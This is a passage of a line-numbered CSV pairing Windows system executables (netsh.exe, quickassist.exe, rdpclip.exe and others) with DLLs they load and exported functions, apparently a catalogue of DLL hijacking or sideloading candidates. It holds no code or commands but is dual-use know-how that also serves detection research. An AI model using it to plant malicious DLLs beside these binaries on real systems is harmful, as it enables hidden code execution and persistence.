 650 | FALSE,"net1.exe","CRYPTBASE.dll","DllMain"
 651 | FALSE,"net1.exe","DSROLE.dll","DllMain"
 652 | FALSE,"net1.exe","logoncli.dll","DllMain"
 653 | FALSE,"net1.exe","netutils.dll","DllMain"
 654 | FALSE,"net1.exe","netutils.dll","NetApiBufferAllocate"
 655 | FALSE,"net1.exe","samcli.dll","DllMain"
 656 | FALSE,"net1.exe","srvcli.dll","DllMain"
 657 | FALSE,"net1.exe","wkscli.dll","DllMain"
 658 | FALSE,"netbtugc.exe","dbgcore.DLL","DllMain"
 659 | FALSE,"netbtugc.exe","IPHLPAPI.DLL","DllMain"
 660 | FALSE,"netbtugc.exe","wdscore.dll","ConstructPartialMsgVA"
 661 | FALSE,"netbtugc.exe","wdscore.dll","CurrentIP"
 662 | FALSE,"netbtugc.exe","wdscore.dll","DllMain"
 663 | FALSE,"netbtugc.exe","wdscore.dll","WdsSetupLogDestroy"
 664 | FALSE,"netbtugc.exe","wdscore.dll","WdsSetupLogInit"
 665 | FALSE,"netbtugc.exe","wdscore.dll","WdsSetupLogMessageA"
 666 | FALSE,"nethost.exe","RASAPI32.dll","DllMain"
 667 | FALSE,"nethost.exe","RASAPI32.dll","RasConfigUserProxySettingsW"
 668 | FALSE,"nethost.exe","rasman.dll","DllMain"
 669 | FALSE,"nethost.exe","rtutils.dll","DllMain"
 670 | FALSE,"nethost.exe","rtutils.dll","TraceRegisterExA"
 671 | FALSE,"netiougc.exe","dbgcore.DLL","DllMain"
 672 | FALSE,"netiougc.exe","dhcpcsvc.DLL","DllMain"
 673 | FALSE,"netiougc.exe","IPHLPAPI.DLL","DllMain"
 674 | FALSE,"netiougc.exe","wdscore.dll","ConstructPartialMsgVA"
 675 | FALSE,"netiougc.exe","wdscore.dll","CurrentIP"
 676 | FALSE,"netiougc.exe","wdscore.dll","DllMain"
 677 | FALSE,"netiougc.exe","wdscore.dll","WdsSetupLogDestroy"
 678 | FALSE,"netiougc.exe","wdscore.dll","WdsSetupLogInit"
 679 | FALSE,"netiougc.exe","wdscore.dll","WdsSetupLogMessageA"
 680 | FALSE,"netsh.exe","adsldpc.dll","DllMain"
 681 | FALSE,"netsh.exe","AUTHFWCFG.DLL","DllMain"
 682 | FALSE,"netsh.exe","AUTHFWCFG.DLL","InitHelperDll"
 683 | FALSE,"netsh.exe","Cabinet.dll","DllMain"
 684 | FALSE,"netsh.exe","CRYPTBASE.DLL","DllMain"
 685 | FALSE,"netsh.exe","DHCPCMONITOR.DLL","DllMain"
 686 | FALSE,"netsh.exe","DHCPCMONITOR.DLL","InitHelperDll"
 687 | FALSE,"netsh.exe","dhcpcsvc.DLL","DllMain"
 688 | FALSE,"netsh.exe","dhcpcsvc6.DLL","DllMain"
 689 | FALSE,"netsh.exe","DNSAPI.dll","DllMain"
 690 | FALSE,"netsh.exe","dot3api.dll","DllMain"
 691 | FALSE,"netsh.exe","DOT3CFG.DLL","DllMain"
 692 | FALSE,"netsh.exe","DOT3CFG.DLL","InitHelperDll"
 693 | FALSE,"netsh.exe","eappcfg.dll","DllMain"
 694 | FALSE,"netsh.exe","eappprxy.dll","DllMain"
 695 | FALSE,"netsh.exe","FirewallAPI.dll","DllMain"
 696 | FALSE,"netsh.exe","FirewallAPI.dll","FwAlloc"
 697 | FALSE,"netsh.exe","FirewallAPI.dll","FwFree"
 698 | FALSE,"netsh.exe","fwbase.dll","DllMain"
 699 | FALSE,"netsh.exe","fwbase.dll","FwAlloc"
 700 | FALSE,"netsh.exe","fwbase.dll","FwBaseAlloc"
 701 | FALSE,"netsh.exe","fwbase.dll","FwBaseFree"
 702 | FALSE,"netsh.exe","fwbase.dll","FwCriticalSectionCreate"
 703 | FALSE,"netsh.exe","fwbase.dll","FwReportErrorAsWinError"
 704 | FALSE,"netsh.exe","FWCFG.DLL","DllMain"
 705 | FALSE,"netsh.exe","FWCFG.DLL","InitHelperDll"
 706 | FALSE,"netsh.exe","FWPolicyIOMgr.dll","DllMain"
 707 | FALSE,"netsh.exe","fwpuclnt.dll","DllMain"
 708 | FALSE,"netsh.exe","HNETMON.DLL","DllMain"
 709 | FALSE,"netsh.exe","HNETMON.DLL","InitHelperDll"
 710 | FALSE,"netsh.exe","HTTPAPI.dll","DllMain"
 711 | FALSE,"netsh.exe","HTTPAPI.dll","HttpInitialize"
 712 | FALSE,"netsh.exe","IFMON.DLL","DllMain"
 713 | FALSE,"netsh.exe","IFMON.DLL","InitHelperDll"
 714 | FALSE,"netsh.exe","IPHLPAPI.DLL","DllMain"
 715 | FALSE,"netsh.exe","IPHLPAPI.DLL","GetDefaultCompartmentId"
 716 | FALSE,"netsh.exe","ktmw32.dll","CreateTransaction"
 717 | FALSE,"netsh.exe","ktmw32.dll","DllMain"
 718 | FALSE,"netsh.exe","mintdh.dll","DllMain"
 719 | FALSE,"netsh.exe","mintdh.dll","TdhpSetWbemExtensionBlock"
 720 | FALSE,"netsh.exe","MobileNetworking.dll","DllMain"
 721 | FALSE,"netsh.exe","NDFAPI.DLL","DllMain"
 722 | FALSE,"netsh.exe","NETIOHLP.DLL","DllMain"
 723 | FALSE,"netsh.exe","NETIOHLP.DLL","InitHelperDll"
 724 | FALSE,"netsh.exe","netshell.dll","DllMain"
 725 | FALSE,"netsh.exe","NETTRACE.DLL","DllMain"
 726 | FALSE,"netsh.exe","NETTRACE.DLL","InitHelperDll"
 727 | FALSE,"netsh.exe","nlaapi.dll","DllMain"
 728 | FALSE,"netsh.exe","NSHHTTP.DLL","DllMain"
 729 | FALSE,"netsh.exe","NSHHTTP.DLL","InitHelperDll"
 730 | FALSE,"netsh.exe","NSHIPSEC.DLL","DllMain"
 731 | FALSE,"netsh.exe","NSHIPSEC.DLL","InitHelperDll"
 732 | FALSE,"netsh.exe","NSHWFP.DLL","DllMain"
 733 | FALSE,"netsh.exe","NSHWFP.DLL","InitHelperDll"
 734 | FALSE,"netsh.exe","OneX.DLL","DllMain"
 735 | FALSE,"netsh.exe","P2P.dll","DllMain"
 736 | FALSE,"netsh.exe","P2PNETSH.DLL","DllMain"
 737 | FALSE,"netsh.exe","P2PNETSH.DLL","InitHelperDll"
 738 | FALSE,"netsh.exe","PEERDISTSH.DLL","DllMain"
 739 | FALSE,"netsh.exe","PEERDISTSH.DLL","InitHelperDll"
 740 | FALSE,"netsh.exe","POLSTORE.DLL","DllMain"
 741 | FALSE,"netsh.exe","POLSTORE.DLL","IPSecOpenPolicyStore"
 742 | FALSE,"netsh.exe","RASAPI32.dll","DllMain"
 743 | FALSE,"netsh.exe","rasman.dll","DllMain"
 744 | FALSE,"netsh.exe","RASMONTR.DLL","DllMain"
 745 | FALSE,"netsh.exe","RASMONTR.DLL","InitHelperDll"
 746 | FALSE,"netsh.exe","RMCLIENT.dll","DllMain"
 747 | FALSE,"netsh.exe","RPCNSH.DLL","DllMain"
 748 | FALSE,"netsh.exe","RPCNSH.DLL","InitHelperDll"
 749 | FALSE,"netsh.exe","SLC.dll","DllMain"
 750 | FALSE,"netsh.exe","SLC.dll","SLRegisterWindowsEvent"
 751 | FALSE,"netsh.exe","sppc.dll","DllMain"
 752 | FALSE,"netsh.exe","sppc.dll","SLRegisterEvent"
 753 | FALSE,"netsh.exe","SspiCli.dll","DllMain"
 754 | FALSE,"netsh.exe","USERENV.dll","DllMain"
 755 | FALSE,"netsh.exe","USERENV.dll","RegisterGPNotification"
 756 | FALSE,"netsh.exe","wcmapi.dll","DllMain"
 757 | FALSE,"netsh.exe","WCNNETSH.DLL","DllMain"
 758 | FALSE,"netsh.exe","WCNNETSH.DLL","InitHelperDll"
 759 | FALSE,"netsh.exe","wdi.dll","DllMain"
 760 | FALSE,"netsh.exe","wevtapi.dll","DllMain"
 761 | FALSE,"netsh.exe","WHHELPER.DLL","DllMain"
 762 | FALSE,"netsh.exe","WHHELPER.DLL","InitHelperDll"
 763 | FALSE,"netsh.exe","WINHTTP.dll","DllMain"
 764 | FALSE,"netsh.exe","WINIPSEC.DLL","DllMain"
 765 | FALSE,"netsh.exe","WINNSI.DLL","DllMain"
 766 | FALSE,"netsh.exe","wlanapi.dll","DllMain"
 767 | FALSE,"netsh.exe","WLANCFG.DLL","DllMain"
 768 | FALSE,"netsh.exe","WLANCFG.DLL","InitHelperDll"
 769 | FALSE,"netsh.exe","WSHELPER.DLL","DllMain"
 770 | FALSE,"netsh.exe","WSHELPER.DLL","InitHelperDll"
 771 | FALSE,"netsh.exe","WWANCFG.DLL","DllMain"
 772 | FALSE,"netsh.exe","WWANCFG.DLL","InitHelperDll"
 773 | FALSE,"netsh.exe","wwapi.dll","DllMain"
 774 | FALSE,"netstat.exe","IPHLPAPI.DLL","DllMain"
 775 | FALSE,"netstat.exe","IPHLPAPI.DLL","InternalGetIfTable"
 776 | FALSE,"netstat.exe","IPHLPAPI.DLL","InternalGetTcpTable2"
 777 | FALSE,"netstat.exe","snmpapi.dll","DllMain"
 778 | FALSE,"netstat.exe","snmpapi.dll","SnmpTfxOpen"
 779 | FALSE,"ngciso.exe","iumbase.DLL","DllMain"
 780 | FALSE,"nltest.exe","logoncli.dll","DllMain"
 781 | FALSE,"nltest.exe","netutils.dll","DllMain"
 782 | FALSE,"nltest.exe","NTDSAPI.dll","DllMain"
 783 | FALSE,"nslookup.exe","DNSAPI.dll","DllMain"
 784 | FALSE,"nslookup.exe","DNSAPI.dll","DnsQueryConfigAllocEx"
 785 | FALSE,"omadmclient.exe","DEVOBJ.dll","DllMain"
 786 | FALSE,"omadmclient.exe","DMCfgUtils.dll","DllMain"
 787 | FALSE,"omadmclient.exe","DMCmnUtils.dll","DllMain"
 788 | FALSE,"omadmclient.exe","dmEnrollEngine.DLL","DllMain"
 789 | FALSE,"omadmclient.exe","dmenterprisediagnostics.dll","DllMain"
 790 | FALSE,"omadmclient.exe","dmiso8601utils.dll","DllMain"
 791 | FALSE,"omadmclient.exe","DMOleAutUtils.dll","DllMain"
 792 | FALSE,"omadmclient.exe","dmxmlhelputils.dll","DllMain"
 793 | FALSE,"omadmclient.exe","IPHLPAPI.DLL","DllMain"
 794 | FALSE,"omadmclient.exe","iri.dll","DllMain"
 795 | FALSE,"omadmclient.exe","omadmapi.dll","DllMain"
 796 | FALSE,"omadmclient.exe","omadmapi.dll","FreeCommandLineOptions"
 797 | FALSE,"omadmclient.exe","omadmapi.dll","OmaDmGetInternalAcctID"
 798 | FALSE,"omadmclient.exe","omadmapi.dll","ProcessCommandLine"
 799 | FALSE,"omadmclient.exe","policymanager.dll","DllMain"
 800 | FALSE,"omadmclient.exe","USERENV.dll","DllMain"
 801 | FALSE,"omadmclient.exe","XmlLite.dll","DllMain"
 802 | FALSE,"openfiles.exe","netutils.dll","DllMain"
 803 | FALSE,"openfiles.exe","srvcli.dll","DllMain"
 804 | FALSE,"openfiles.exe","SspiCli.dll","DllMain"
 805 | FALSE,"osk.exe","AUDIOSES.DLL","DllMain"
 806 | FALSE,"osk.exe","AVRT.dll","DllMain"
 807 | FALSE,"osk.exe","DEVOBJ.dll","DevObjCreateDeviceInfoList"
 808 | FALSE,"osk.exe","DEVOBJ.dll","DllMain"
 809 | FALSE,"osk.exe","dwmapi.dll","DllMain"
 810 | FALSE,"osk.exe","dwmapi.dll","DwmIsCompositionEnabled"
 811 | FALSE,"osk.exe","dwmapi.dll","DwmSetWindowAttribute"
 812 | FALSE,"osk.exe","ksuser.dll","DllMain"
 813 | FALSE,"osk.exe","midimap.dll","DllMain"
 814 | FALSE,"osk.exe","midimap.dll","DriverProc"
 815 | FALSE,"osk.exe","MMDevAPI.DLL","DllMain"
 816 | FALSE,"osk.exe","MSACM32.dll","acmGetVersion"
 817 | FALSE,"osk.exe","MSACM32.dll","DllMain"
 818 | FALSE,"osk.exe","OLEACC.dll","AccessibleObjectFromWindowTimeout"
 819 | FALSE,"osk.exe","OLEACC.dll","AccSetRunningUtilityState"
 820 | FALSE,"osk.exe","OLEACC.dll","DllMain"
 821 | FALSE,"osk.exe","OLEACC.dll","GetProcessHandleFromHwnd"
 822 | FALSE,"osk.exe","OskSupport.dll","DllMain"
 823 | FALSE,"osk.exe","OskSupport.dll","InitializeOSKSupport"
 824 | FALSE,"osk.exe","OskSupport.dll","UninitializeOSKSupport"
 825 | FALSE,"osk.exe","WindowsCodecs.dll","DllMain"
 826 | FALSE,"osk.exe","WindowsCodecs.dll","WICCreateImagingFactory_Proxy"
 827 | FALSE,"osk.exe","WMsgAPI.dll","DllMain"
 828 | FALSE,"pacjsworker.exe","WINHTTP.dll","DllMain"
 829 | FALSE,"packageinspector.exe","msi.dll","DllMain"
 830 | FALSE,"packageinspector.exe","SLC.dll","DllMain"
 831 | FALSE,"packageinspector.exe","SLC.dll","SLGetWindowsInformationDWORD"
 832 | FALSE,"packageinspector.exe","sppc.dll","DllMain"
 833 | FALSE,"packageinspector.exe","wevtapi.dll","DllMain"
 834 | FALSE,"pathping.exe","IPHLPAPI.DLL","DllMain"
 835 | FALSE,"pcalua.exe","pcaui.dll","DllMain"
 836 | FALSE,"pcalua.exe","wer.dll","DllMain"
 837 | FALSE,"pinenrollmentbroker.exe","PROPSYS.dll","DllMain"
 838 | FALSE,"pinenrollmentbroker.exe","SspiCli.dll","DllMain"
 839 | FALSE,"pktmon.exe","mintdh.dll","DllMain"
 840 | FALSE,"pktmon.exe","mintdh.dll","TdhpSetWbemExtensionBlock"
 841 | FALSE,"plasrv.exe","Cabinet.dll","DllMain"
 842 | FALSE,"plasrv.exe","mintdh.dll","DllMain"
 843 | FALSE,"plasrv.exe","mintdh.dll","TdhpSetWbemExtensionBlock"
 844 | FALSE,"plasrv.exe","pdh.dll","DllMain"
 845 | FALSE,"plasrv.exe","tdh.dll","DllMain"
 846 | FALSE,"plasrv.exe","wevtapi.dll","DllMain"
 847 | FALSE,"pnpunattend.exe","dbgcore.DLL","DllMain"
 848 | FALSE,"pnpunattend.exe","DEVRTL.dll","DllMain"
 849 | FALSE,"pnpunattend.exe","newdev.dll","DllMain"
 850 | FALSE,"pnpunattend.exe","wdscore.dll","ConstructPartialMsgVW"
 851 | FALSE,"pnpunattend.exe","wdscore.dll","CurrentIP"
 852 | FALSE,"pnpunattend.exe","wdscore.dll","DllMain"
 853 | FALSE,"pnpunattend.exe","wdscore.dll","WdsSetupLogDestroy"
 854 | FALSE,"pnpunattend.exe","wdscore.dll","WdsSetupLogInit"
 855 | FALSE,"pnpunattend.exe","wdscore.dll","WdsSetupLogMessageW"
 856 | FALSE,"presentationhost.exe","CRYPTBASE.DLL","DllMain"
 857 | FALSE,"presentationhost.exe","mscoree.dll","CorExitProcess"
 858 | FALSE,"presentationhost.exe","mscoree.dll","DllMain"
 859 | FALSE,"presentationhost.exe","WININET.dll","DllMain"
 860 | FALSE,"presentationsettings.exe","SspiCli.dll","DllMain"
 861 | FALSE,"presentationsettings.exe","SspiCli.dll","GetUserNameExW"
 862 | FALSE,"printbrmui.exe","IPHLPAPI.DLL","DllMain"
 863 | FALSE,"printbrmui.exe","PROPSYS.dll","DllMain"
 864 | FALSE,"psr.exe","AEPIC.dll","DllMain"
 865 | FALSE,"psr.exe","CLDAPI.dll","CfGetPlaceholderStateFromAttributeTag"
 866 | FALSE,"psr.exe","CLDAPI.dll","DllMain"
 867 | FALSE,"psr.exe","FLTLIB.DLL","DllMain"
 868 | FALSE,"psr.exe","HID.DLL","DllMain"
 869 | FALSE,"psr.exe","msdrm.dll","DllMain"
 870 | FALSE,"psr.exe","OLEACC.dll","DllMain"
 871 | FALSE,"psr.exe","SspiCli.dll","DllMain"
 872 | FALSE,"psr.exe","SspiCli.dll","GetUserNameExW"
 873 | FALSE,"psr.exe","uireng.dll","DllMain"
 874 | FALSE,"psr.exe","uireng.dll","UirInitializeEngine"
 875 | FALSE,"psr.exe","XmlLite.dll","DllMain"
 876 | FALSE,"query.exe","logoncli.dll","DllMain"
 877 | FALSE,"query.exe","netutils.dll","DllMain"
 878 | FALSE,"query.exe","REGAPI.dll","DllMain"
 879 | FALSE,"query.exe","REGAPI.dll","RegQueryUtilityCommandList"
 880 | FALSE,"query.exe","samcli.dll","DllMain"
 881 | FALSE,"query.exe","srvcli.dll","DllMain"
 882 | FALSE,"query.exe","utildll.dll","DllMain"
 883 | FALSE,"query.exe","WINSTA.dll","DllMain"
 884 | FALSE,"quickassist.exe","ATL.DLL","AtlComPtrAssign"
 885 | FALSE,"quickassist.exe","ATL.DLL","DllMain"
 886 | FALSE,"quickassist.exe","CRYPTBASE.DLL","DllMain"
 887 | FALSE,"quickassist.exe","CRYPTBASE.DLL","SystemFunction036"
 888 | FALSE,"quickassist.exe","d2d1.dll","DllMain"
 889 | FALSE,"quickassist.exe","d3d11.dll","DllMain"
 890 | FALSE,"quickassist.exe","dcomp.dll","DllMain"
 891 | FALSE,"quickassist.exe","dxgi.dll","DllMain"
 892 | FALSE,"quickassist.exe","PROPSYS.dll","DllMain"
 893 | FALSE,"quickassist.exe","PROPSYS.dll","VariantToStringWithDefault"
 894 | FALSE,"quickassist.exe","SAS.dll","DllMain"
 895 | FALSE,"quickassist.exe","SspiCli.dll","AcquireCredentialsHandleA"
 896 | FALSE,"quickassist.exe","SspiCli.dll","DllMain"
 897 | FALSE,"quickassist.exe","SspiCli.dll","GetUserNameExA"
 898 | FALSE,"quickassist.exe","SspiCli.dll","GetUserNameExW"
 899 | FALSE,"quickassist.exe","SspiCli.dll","InitializeSecurityContextA"
 900 | FALSE,"quickassist.exe","SspiCli.dll","QueryContextAttributesExA"
 901 | FALSE,"quickassist.exe","UxTheme.dll","DllMain"
 902 | FALSE,"quickassist.exe","UxTheme.dll","SetWindowThemeAttribute"
 903 | FALSE,"quickassist.exe","WindowsCodecs.dll","DllMain"
 904 | FALSE,"quickassist.exe","WININET.dll","AppCacheGetGroupList"
 905 | FALSE,"quickassist.exe","WININET.dll","DllMain"
 906 | FALSE,"quickassist.exe","WININET.dll","InternetInitializeAutoProxyDll"
 907 | FALSE,"quickassist.exe","WININET.dll","InternetOpenW"
 908 | FALSE,"quickassist.exe","WININET.dll","InternetSetOptionW"
 909 | FALSE,"quser.exe","logoncli.dll","DllMain"
 910 | FALSE,"quser.exe","netutils.dll","DllMain"
 911 | FALSE,"quser.exe","samcli.dll","DllMain"
 912 | FALSE,"quser.exe","srvcli.dll","DllMain"
 913 | FALSE,"quser.exe","UTILDLL.dll","DllMain"
 914 | FALSE,"quser.exe","UTILDLL.dll","StrConnectState"
 915 | FALSE,"quser.exe","WINSTA.dll","DllMain"
 916 | FALSE,"quser.exe","WINSTA.dll","WinStationEnumerateW"
 917 | FALSE,"qwinsta.exe","logoncli.dll","DllMain"
 918 | FALSE,"qwinsta.exe","netutils.dll","DllMain"
 919 | FALSE,"qwinsta.exe","samcli.dll","DllMain"
 920 | FALSE,"qwinsta.exe","srvcli.dll","DllMain"
 921 | FALSE,"qwinsta.exe","UTILDLL.dll","DllMain"
 922 | FALSE,"qwinsta.exe","UTILDLL.dll","StrConnectState"
 923 | FALSE,"qwinsta.exe","WINSTA.dll","DllMain"
 924 | FALSE,"qwinsta.exe","WINSTA.dll","WinStationEnumerateW"
 925 | FALSE,"rasautou.exe","MPRAPI.dll","DllMain"
 926 | FALSE,"rasautou.exe","rasman.dll","DllMain"
 927 | FALSE,"rasautou.exe","rtutils.dll","DllMain"
 928 | FALSE,"rasdial.exe","RASAPI32.dll","DllMain"
 929 | FALSE,"rasdial.exe","RASAPI32.dll","RasCompleteDialMachineCleanup"
 930 | FALSE,"rasdial.exe","RASAPI32.dll","RasEnumConnectionsW"
 931 | FALSE,"rasdial.exe","rasman.dll","DllMain"
 932 | FALSE,"rasdial.exe","rasman.dll","RasConnectionEnum"
 933 | FALSE,"rasdial.exe","rasman.dll","RasInitialize"
 934 | FALSE,"rasdial.exe","rtutils.dll","DllMain"
 935 | FALSE,"rasdial.exe","rtutils.dll","TracePrintfExA"
 936 | FALSE,"rasdial.exe","rtutils.dll","TraceRegisterExA"
 937 | FALSE,"raserver.exe","netutils.dll","DllMain"
 938 | FALSE,"raserver.exe","samcli.dll","DllMain"
 939 | FALSE,"raserver.exe","WTSAPI32.dll","DllMain"
 940 | FALSE,"rdpclip.exe","CRYPTBASE.DLL","DllMain"
 941 | FALSE,"rdpclip.exe","DEVOBJ.dll","DevObjCreateDeviceInfoList"
 942 | FALSE,"rdpclip.exe","DEVOBJ.dll","DevObjDestroyDeviceInfoList"
 943 | FALSE,"rdpclip.exe","DEVOBJ.dll","DevObjEnumDeviceInfo"
 944 | FALSE,"rdpclip.exe","DEVOBJ.dll","DevObjEnumDeviceInterfaces"
 945 | FALSE,"rdpclip.exe","DEVOBJ.dll","DevObjGetClassDevs"
 946 | FALSE,"rdpclip.exe","DEVOBJ.dll","DevObjGetDeviceInfoListDetail"
 947 | FALSE,"rdpclip.exe","DEVOBJ.dll","DevObjGetDeviceInterfaceDetail"
 948 | FALSE,"rdpclip.exe","DEVOBJ.dll","DllMain"
 949 | FALSE,"rdpclip.exe","dwmapi.dll","DllMain"
 950 | FALSE,"rdpclip.exe","IPHLPAPI.DLL","DllMain"
 951 | FALSE,"rdpclip.exe","PROPSYS.dll","DllMain"
 952 | FALSE,"rdpclip.exe","srpapi.dll","DllMain"
 953 | FALSE,"rdpclip.exe","WINSTA.dll","DllMain"
 954 | FALSE,"rdpclip.exe","WINSTA.dll","WinStationNameFromLogonIdW"
 955 | FALSE,"rdpclip.exe","WINSTA.dll","WinStationQueryInformationW"
 956 | FALSE,"rdpclip.exe","WINSTA.dll","WinStationRegisterConsoleNotification"
 957 | FALSE,"rdpclip.exe","WINSTA.dll","WinStationVirtualOpenEx"
 958 | FALSE,"rdpclip.exe","WTSAPI32.dll","DllMain"
 959 | FALSE,"rdpclip.exe","WTSAPI32.dll","WTSQuerySessionInformationW"
 960 | FALSE,"rdpclip.exe","WTSAPI32.dll","WTSRegisterSessionNotification"
 961 | FALSE,"rdpclip.exe","WTSAPI32.dll","WTSVirtualChannelOpen"
 962 | FALSE,"rdpclip.exe","WTSAPI32.dll","WTSVirtualChannelOpenEx"
 963 | FALSE,"rdpsa.exe","SspiCli.dll","DllMain"
 964 | FALSE,"rdpsa.exe","WINSTA.dll","DllMain"
 965 | FALSE,"rdpsauachelper.exe","WINSTA.dll","DllMain"
 966 | FALSE,"rdpsauachelper.exe","WINSTA.dll","WinStationGetAllProcesses"
 967 | FALSE,"rdpshell.exe","dwmapi.dll","DllMain"
 968 | FALSE,"rdpshell.exe","WINSTA.dll","DllMain"
 969 | FALSE,"rdpshell.exe","WINSTA.dll","WinStationGetConnectionProperty"
 970 | FALSE,"rdpshell.exe","WTSAPI32.dll","DllMain"
 971 | FALSE,"rdvghelper.exe","dwmapi.dll","DllMain"
 972 | FALSE,"rdvghelper.exe","WINSTA.dll","DllMain"
 973 | FALSE,"rdvghelper.exe","WINSTA.dll","WinStationRegisterConsoleNotification"
 974 | FALSE,"rdvghelper.exe","WTSAPI32.dll","DllMain"
 975 | FALSE,"rdvghelper.exe","WTSAPI32.dll","WTSRegisterSessionNotification"
 976 | FALSE,"reagentc.exe","Cabinet.dll","DllMain"
 977 | FALSE,"reagentc.exe","ReAgent.dll","DllMain"
 978 | FALSE,"reagentc.exe","ReAgent.dll","WinReGetError"
 979 | FALSE,"reagentc.exe","ReAgent.dll","WinReSetError"
 980 | FALSE,"recover.exe","DEVOBJ.dll","DllMain"
 981 | FALSE,"register-cimprovider.exe","miutils.dll","DllMain"
 982 | FALSE,"register-cimprovider.exe","prvdmofcomp.dll","CreateRegisterParameter"
 983 | FALSE,"register-cimprovider.exe","prvdmofcomp.dll","DllMain"
 984 | FALSE,"rekeywiz.exe","credui.dll","DllMain"
 985 | FALSE,"rekeywiz.exe","CRYPTBASE.DLL","DllMain"
 986 | FALSE,"rekeywiz.exe","CRYPTUI.dll","DllMain"
 987 | FALSE,"rekeywiz.exe","DSROLE.dll","DllMain"
 988 | FALSE,"rekeywiz.exe","DSROLE.dll","DsRoleGetPrimaryDomainInformation"
 989 | FALSE,"rekeywiz.exe","duser.dll","DllMain"
 990 | FALSE,"rekeywiz.exe","EFSADU.dll","DllMain"
 991 | FALSE,"rekeywiz.exe","EFSUTIL.dll","DllMain"
 992 | FALSE,"rekeywiz.exe","EFSUTIL.dll","EfsUtilApplyGroupPolicy"
 993 | FALSE,"rekeywiz.exe","FeClient.dll","DllMain"
 994 | FALSE,"rekeywiz.exe","logoncli.dll","DllMain"
 995 | FALSE,"rekeywiz.exe","netutils.dll","DllMain"
 996 | FALSE,"rekeywiz.exe","USERENV.dll","DllMain"
 997 | FALSE,"rekeywiz.exe","VAULTCLI.dll","DllMain"
 998 | FALSE,"relog.exe","pdh.dll","DllMain"
 999 | FALSE,"relpost.exe","Cabinet.dll","DllMain"
1000 | FALSE,"relpost.exe","ReAgent.dll","DllMain"
1001 | FALSE,"relpost.exe","wer.dll","DllMain"
1002 | FALSE,"repair-bde.exe","BDEREPAIR.dll","DllMain"
1003 | FALSE,"reset.exe","logoncli.dll","DllMain"
1004 | FALSE,"reset.exe","netutils.dll","DllMain"
1005 | FALSE,"reset.exe","REGAPI.dll","DllMain"
1006 | FALSE,"reset.exe","REGAPI.dll","RegQueryUtilityCommandList"
1007 | FALSE,"reset.exe","samcli.dll","DllMain"
1008 | FALSE,"reset.exe","srvcli.dll","DllMain"
1009 | FALSE,"reset.exe","utildll.dll","DllMain"
1010 | FALSE,"reset.exe","WINSTA.dll","DllMain"
1011 | FALSE,"resetengine.exe","bcd.dll","DllMain"
1012 | FALSE,"resetengine.exe","Cabinet.dll","DllMain"
1013 | FALSE,"resetengine.exe","DismApi.DLL","DllMain"
1014 | FALSE,"resetengine.exe","FVEAPI.dll","DllMain"
1015 | FALSE,"resetengine.exe","ReAgent.dll","DllMain"
1016 | FALSE,"resetengine.exe","ResetEngine.dll","DllMain"
1017 | FALSE,"resetengine.exe","tbs.dll","DllMain"
1018 | FALSE,"resetengine.exe","VSSAPI.DLL","DllMain"
1019 | FALSE,"resetengine.exe","VssTrace.DLL","DllMain"
1020 | FALSE,"resetengine.exe","WDSCORE.dll","DllMain"
1021 | FALSE,"resetengine.exe","WIMGAPI.DLL","DllMain"
1022 | FALSE,"resetengine.exe","WINHTTP.dll","DllMain"
1023 | FALSE,"resetengine.exe","WOFUTIL.dll","DllMain"
1024 | FALSE,"resetengine.exe","XmlLite.dll","DllMain"
1025 | FALSE,"resmon.exe","CLDAPI.dll","CfGetPlaceholderStateFromAttributeTag"
1026 | FALSE,"resmon.exe","CLDAPI.dll","DllMain"
1027 | FALSE,"resmon.exe","CRYPTBASE.DLL","DllMain"
1028 | FALSE,"resmon.exe","edputil.dll","DllMain"
1029 | FALSE,"resmon.exe","edputil.dll","EdpGetIsManaged"
1030 | FALSE,"resmon.exe","FLTLIB.DLL","DllMain"
1031 | FALSE,"resmon.exe","PROPSYS.dll","DllMain"
1032 | FALSE,"resmon.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
1033 | FALSE,"resmon.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
1034 | FALSE,"rmactivate.exe","CRYPTBASE.dll","DllMain"
1035 | FALSE,"rmactivate.exe","CRYPTBASE.dll","SystemFunction036"
1036 | FALSE,"rmactivate.exe","msdrm.dll","__AddMachineCertToLicenseStore"
1037 | FALSE,"rmactivate.exe","msdrm.dll","DllMain"
1038 | FALSE,"rmactivate_isv.exe","msdrm.dll","__AddMachineCertToLicenseStore"
1039 | FALSE,"rmactivate_isv.exe","msdrm.dll","DllMain"
1040 | FALSE,"rmactivate_ssp_isv.exe","CRYPTBASE.dll","DllMain"
1041 | FALSE,"rmactivate_ssp_isv.exe","CRYPTBASE.dll","SystemFunction036"
1042 | FALSE,"rmttpmvscmgrsvr.exe","DEVOBJ.dll","DllMain"
1043 | FALSE,"route.exe","IPHLPAPI.DLL","DllMain"
1044 | FALSE,"rpcping.exe","credui.dll","DllMain"
1045 | FALSE,"rpcping.exe","SspiCli.dll","DllMain"
1046 | FALSE,"rpcping.exe","WINHTTP.dll","DllMain"
1047 | FALSE,"rwinsta.exe","logoncli.dll","DllMain"
1048 | FALSE,"rwinsta.exe","netutils.dll","DllMain"
1049 | FALSE,"rwinsta.exe","samcli.dll","DllMain"
1050 | FALSE,"rwinsta.exe","srvcli.dll","DllMain"
1051 | FALSE,"rwinsta.exe","utildll.dll","DllMain"
1052 | FALSE,"rwinsta.exe","WINSTA.dll","DllMain"
1053 | FALSE,"searchfilterhost.exe","TQUERY.DLL","DllMain"
1054 | FALSE,"secedit.exe","SCECLI.dll","DllMain"
1055 | FALSE,"securityhealthservice.exe","DNSAPI.dll","DllMain"
1056 | FALSE,"securityhealthservice.exe","FirewallAPI.dll","DllMain"
1057 | FALSE,"securityhealthservice.exe","fwbase.dll","DllMain"
1058 | FALSE,"securityhealthservice.exe","fwbase.dll","FwCriticalSectionCreate"
1059 | FALSE,"securityhealthservice.exe","fwbase.dll","FwCriticalSectionDestroy"
1060 | FALSE,"securityhealthservice.exe","USERENV.dll","DllMain"
1061 | FALSE,"securityhealthservice.exe","Wldp.dll","DllMain"
1062 | FALSE,"securityhealthservice.exe","WTSAPI32.dll","DllMain"
1063 | FALSE,"settingsynchost.exe","policymanager.dll","DllMain"
1064 | FALSE,"settingsynchost.exe","PROPSYS.dll","DllMain"
1065 | FALSE,"settingsynchost.exe","USERENV.dll","DllMain"
1066 | FALSE,"setupugc.exe","dbgcore.DLL","DllMain"
1067 | FALSE,"setupugc.exe","DNSAPI.dll","DllMain"
1068 | FALSE,"setupugc.exe","WDSCORE.dll","ConstructPartialMsgVW"
1069 | FALSE,"setupugc.exe","WDSCORE.dll","CurrentIP"
1070 | FALSE,"setupugc.exe","WDSCORE.dll","DllMain"
